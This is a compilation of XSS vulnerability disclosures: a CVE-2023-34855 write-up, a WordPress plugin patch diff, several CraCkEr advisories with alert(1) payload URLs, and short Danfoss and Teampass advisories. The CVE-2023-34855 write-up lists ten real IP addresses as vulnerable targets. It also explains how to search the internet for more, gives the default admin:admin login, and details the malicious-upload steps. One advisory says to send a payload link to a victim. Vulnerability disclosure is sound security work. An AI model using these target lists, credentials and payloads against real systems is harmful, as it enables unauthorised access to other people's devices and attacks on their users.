A Cross Site Scripting (XSS) vulnerability in Youxun Electronic Equipment (Shanghai) Co., Ltd AC Centralized Management Platform v1.02.040 allows attackers to execute arbitrary code via uploading a crafted HTML file to the interface /upfile.cgi.

1.  Search vulnerable products on internet  
    Go to https://hunter.qianxin.com/, and use this syntax to search potential vulnerable products existing on internet:web.body="login_title: 'D-Link路由器管理页'"  
    

Please note that not all assets displayed in the result table are target products. You need to right-click to view the website source code and view the "title" label in the form. If it is the "AC Central Management Platform", it is as follows:  

A list of vulnerable targets are as follows:  
http://183.214.192.254:800/  
http://175.13.32.193:800/  
http://218.8.101.103:800/  
http://58.211.213.42:800/  
http://111.175.59.107:800/  
http://36.27.95.28:800/  
http://175.166.219.151:800/  
http://222.175.246.46:800/  
http://112.248.79.147:800/  
http://125.120.107.39:800/

2.  Login with default credential  
    The default credential is admin : admin  
    

Login successful.

3.  Upload your payloads  
    Firstly, click on "系统配置",  
    Secondly, click on "AP 系统管理",  
    Then, we click to browse the file and need to upload a file with the suffix ".trx"  
    Finally, click on upload and we will use BurpSuite to intercept  
      
    

We need to change the suffix ". trx" marked in the diagram to ". html", and then proceed with the contract,  
After the contract is awarded, there is a file path in the corresponding package for us to access  

Finally, we can trigger by accessing this address  

It is important that victims can access this url without login in.

CVE-2023-34855: Stored Cross-Site Scripting (XSS) Vulnerability in Youxun Electronic Equipment (Shanghai) Co., Ltd. AC Centralized Management Platform 1.02.040 · Issue #1 · hashshfza/Vulnerability

A vulnerability classified as problematic was found in cchetanonline WP-CopyProtect up to 3.0.0. This vulnerability affects the function CopyProtect_options_page of the file wp-copyprotect.php. The manipulation of the argument CopyProtect_nrc_text leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 3.1.0 is able to address this issue. The patch is identified as 8b8fe4102886b326330dc1ff06b17313fb10aee5. It is recommended to upgrade the affected component. VDB-231202 is the identifier assigned to this vulnerability.

Expand Up @@ -3,13 +3,13 @@ Plugin Name: WP-CopyProtect \[Protect your blog posts\] Plugin URI: http://chetangole.com/blog/wp-copyprotect/ Description: This plug-in will protect your blog content \[posts\] from being copied. A simple plug-in developed to stop the Copy cats. Version: 3.0.0 Version: 3.1.0 Author: Chetan Gole Author URI: http://chetangole.com/ \*/  
/\* Copyright (C) 2013 Chetan Gole - chetangole.com Copyright (C) 2015 Chetan Gole - chetangole.com This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License Expand All @@ -33,7 +33,7 @@ function CopyProtect\_no\_right\_click($CopyProtect\_click\_message) <script type\="text/javascript"\> <!\-- /\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\* COPY PROTECTED BY CHETANGOLE.COM/BLOG/WP-COPYPROTECT version 3.0.0 \*\*\*\* \*\*\* COPY PROTECTED BY http://chetangole.com/blog/wp-copyprotect/ version 3.1.0 \*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*/ var message\="<?php echo $CopyProtect\_click\_message; ?>"; function clickIE4(){ Expand Down Expand Up @@ -72,7 +72,7 @@ function CopyProtect\_no\_right\_click\_without\_message() <script type\="text/javascript"\> <!\-- /\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\* COPY PROTECTED BY CHETANGOLE.COM/BLOG/WP-COPYPROTECT version 3.0.0 \*\*\*\* \*\*\* COPY PROTECTED BY http://chetangole.com/blog/wp-copyprotect/ version 3.1.0 \*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*/ function clickIE4(){ if (event.button\==2){ Expand Down Expand Up @@ -107,7 +107,7 @@ function CopyProtect\_no\_select() ?> <script type\="text/javascript"\> /\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\* COPY PROTECTED BY CHETANGOLE.COM/BLOG/WP-COPYPROTECT version 3.0.0 \*\*\*\* \*\*\* COPY PROTECTED BY http://chetangole.com/blog/wp-copyprotect/ version 3.1.0 \*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*/ function disableSelection(target){ if (typeof target.onselectstart!="undefined") //For IE Expand Down Expand Up @@ -147,11 +147,11 @@ function CopyProtect\_options\_page() if($\_POST\['CopyProtect\_save'\]){ update\_option('CopyProtect\_nrc',$\_POST\['CopyProtect\_nrc'\]); update\_option('CopyProtect\_nts',$\_POST\['CopyProtect\_nts'\]); update\_option('CopyProtect\_nrc\_text',$\_POST\['CopyProtect\_nrc\_text'\]); update\_option('CopyProtect\_nrc\_text', sanitize\_text\_field($\_POST\['CopyProtect\_nrc\_text'\])); update\_option('CopyProtect\_credit',$\_POST\['CopyProtect\_credit'\]); update\_option('CopyProtect\_user\_setting',$\_POST\['CopyProtect\_user\_setting'\]);  
echo '<div class="updated"><p>Settings saved</p></div>'; echo '<div class="updated"><p>Settings saved, Please clear/update cache if you are using any cache plugin</p></div>'; } $wp\_CopyProtect\_nrc = get\_option('CopyProtect\_nrc'); $wp\_CopyProtect\_nts = get\_option('CopyProtect\_nts'); Expand Down

CVE-2015-10118: Sanitising user input for protection. Avoiding XSS attacks. Reference… · wp-plugins/wp-copyprotect@8b8fe41

OmniCart version 3.4.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/32794/ - Pixobit Solutions                  ││  Vendor   : OmniCart - https://omnicartshop.com/                                       ││  Software : OmniCart 3.4.0                                                             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /GET parameter 'lang' is vulnerable to RXSShttps://website/?lang=ar&ms4sp"><script>alert(1)</script>ffj2=1Path: /index.php/searchGET parameter 'search' is vulnerable to RXSShttps://website/index.php/search?search=123&h45te"><script>alert(1)</script>khuqf=1[-] Done

OmniCart 3.4.0 Cross Site Scripting

LearnDesk version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/35390/                                      ││  Vendor   : wvidesk.com                                                                ││  Software : LearnDesk 1.0                                                              ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ebook-detailsGET parameter 'eBook' is vulnerable to RXSShttps://website/ebook-details?eBook=2-20230526090815bgijo"><script>alert(1)</script>nq0d9[-] Done

LearnDesk 1.0 Cross Site Scripting

BB Machine Forum version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/38745/                                      ││  Vendor   : webfuelcode                                                                ││  Software : BB Machine Forum 1.0                                                       ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /threadPOST parameter 'thread' is vulnerable to RXSS[+] Exploiting the Bug1. From Index Page Click on Create Post2. Fill any Subject3. Select Any Category  4. in Thread "Put Your XSS Payload" example v4kow<script>alert(1)</script>ebxnq5. Click on Submit6. XSS Fired7. Copy the link of your Post and send it to the Victim example: https://website/thread/Your-POST8. XSS Fired on Victim Browser[-] Done

BB Machine Forum 1.0 Cross Site Scripting

Expert X Jobs Portal And Resume Builder version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/36326/                                      ││  Vendor   : wvidesk.com                                                                ││  Software : Expert X Jobs Portal And Resume Builder 1.0                                ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /companiesGET parameter 'listed' is vulnerable to RXSShttp://expert.wvidesk.com/companies?listed=z2rqw--><script>alert(1)</script>p8lvhPath: /search-fieldGET parameter 'pos_ref' is vulnerable to RXSShttp://expert.wvidesk.com/search-field?pos_ref=qfq5c"><script>alert(1)</script>xosrj Path: /search-fieldGET parameter 'frmPositionCountry' is vulnerable to RXSShttp://expert.wvidesk.com/search-field?pos_ref=it&frmPositionCountry=qfq5c"><script>alert(1)</script>xosrj&page=0[-] Done

Expert X Jobs Portal And Resume Builder 1.0 Cross Site Scripting

The Danfoss AK-EM100 web applications allow for Reflected Cross-Site Scripting.

CVE-2023-22582

The Danfoss AK-EM100 web applications allow for Reflected Cross-Site Scripting in the title parameter.

CVE-2023-22585

In versions of nilsteampassnet/teampass prior to 3.0.9 some user input was not properly sanitized which may have lead to stored cross-site scripting (XSS) vectors in the application.

**Teampass Cross-site Scripting vulnerability**

Low severity GitHub Reviewed Published Jun 10, 2023 to the GitHub Advisory Database • Updated Jun 12, 2023

GHSA-p7xm-g427-jxfc: Teampass Cross-site Scripting vulnerability

**Teampass Cross-site Scripting vulnerability**

High severity GitHub Reviewed Published Jun 10, 2023 to the GitHub Advisory Database • Updated Jun 12, 2023

Tag

#xss